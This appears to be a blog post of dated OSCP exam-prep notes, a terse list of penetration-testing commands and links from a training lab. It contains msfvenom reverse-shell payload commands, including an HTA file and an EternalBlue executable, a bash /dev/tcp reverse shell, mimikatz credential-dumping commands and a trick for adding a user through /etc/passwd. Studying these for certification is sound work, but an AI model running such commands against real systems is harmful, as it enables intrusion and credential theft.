Skip to main content
August OSCP Notes
August 4, 2020
- sudo -u scriptmanager /bin/bash
- /bin/bash -i
- Sherlock for Windows. linuxprivcheck for Linux.
- Domain Controller (DC) is head honcho of Active Directory
- Check crontab to see if root is running anything
- sudo -l to see what you can do
August 19, 2020
- https://www.youtube.com/watch?v=5Tlx7D2djes
- Delete all your snapshots. Use gparted. Delete anything in the middle. Slide over.
- c:\windows\system32\drivers\etc\hosts <- Use this for LFI (Local file inclusion check for windows os)
August 20, 2020
- https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php (Has worked before
>
- php -S 0.0.0.0:80 exists like python -m SimpleHttpServer 80
- ruby -run -e httpd . -p 9000
August 22, 2020
- Can create HTA files to execute in Internet Explorer
- sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
August 23, 2020
- nmap --script vuln -p139,445 192.168.0.18
- sudo -i (rage)
August 24, 2020
- msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.184 LPORT=7777 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
- https://nullsec.us/eternalblue-on-windows-xp/
- https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/
August 25, 2020
- crunch 8 8 -t ,@@^^%%%
- 8 min 8 max char
August 30, 2020
- privilege::debug
- sekurlsa::logonPasswords
- sudo apt-get install gcc-multilib
August 31, 2020
- ./exploit.py 10.11.1.231 "bash -i >& /dev/tcp/192.168.119.184/9999 0>&1"
- openssl passwd evil (gens hash for /etc/passwd file)
Comments
Post a Comment